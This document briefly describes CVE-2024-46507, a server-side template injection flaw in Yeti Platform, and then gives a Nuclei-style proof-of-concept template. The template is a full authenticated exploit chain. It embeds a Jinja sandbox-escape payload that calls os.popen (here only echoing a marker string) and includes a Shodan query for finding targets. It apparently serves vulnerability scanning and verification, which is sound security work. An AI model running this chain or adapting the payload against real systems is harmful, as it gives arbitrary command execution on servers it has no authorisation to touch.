The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
PoC代码[已公开]
id: CVE-2024-46507
info:
name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
impact: |
Successful exploitation enables an attacker to execute arbitrary system commands, potentially leading to full server compromise.
remediation: |
Upgrade to Yeti Platform 2.1.12 or later to mitigate this vulnerability.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/
metadata:
shodan-query: html:"Yeti</title>"
verified: true
max-request: 4
tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v2/auth/token HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n
------WebKitFormBoundaryodI9qNm7xBZLCq9n
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryodI9qNm7xBZLCq9n
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryodI9qNm7xBZLCq9n--
matchers:
- type: word
part: body
words:
- access_token
internal: true
- raw:
- |
POST /api/v2/templates/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"template":{"name":"AA","template":"value,tags\n{% for obj in data %}{{obj.value}},{{\";\".join(obj.tags.keys())}}\n{% endfor %}\n\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"echo Q1ZFLTIwMjQtNDY1MDcK | base64 -d\").read()}}{%endif%}{% endfor %}"}}
skip-variables-check: true
extractors:
- type: json
part: body
name: template_id
json:
- '.id'
internal: true
- raw:
- |
POST /api/v2/observables/extended HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"observable":{"type":"ipv4","value":"1.{{randint(1,255)}}.{{randint(1,255)}}.{{randint(1,255)}}"}}
extractors:
- type: json
part: body
name: observable_id
json:
- '.id'
internal: true
- raw:
- |
POST /api/v2/templates/render HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"template_id":"{{template_id}}","observable_ids":["{{observable_id}}"],"search_query":""}
matchers:
- type: dsl
dsl:
- 'contains(body, "CVE-2024-46507")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4b0a004830460221009f569bf0a9b0efd94803a83533e317c4b9ac63857ad432c24c70545d8011ccaa022100e93dfde04a6a3f980cd6739367525a799de3e4c25bfb7c88fb517d4acfec4e59:922c64590222798bb761d5b6d8e72950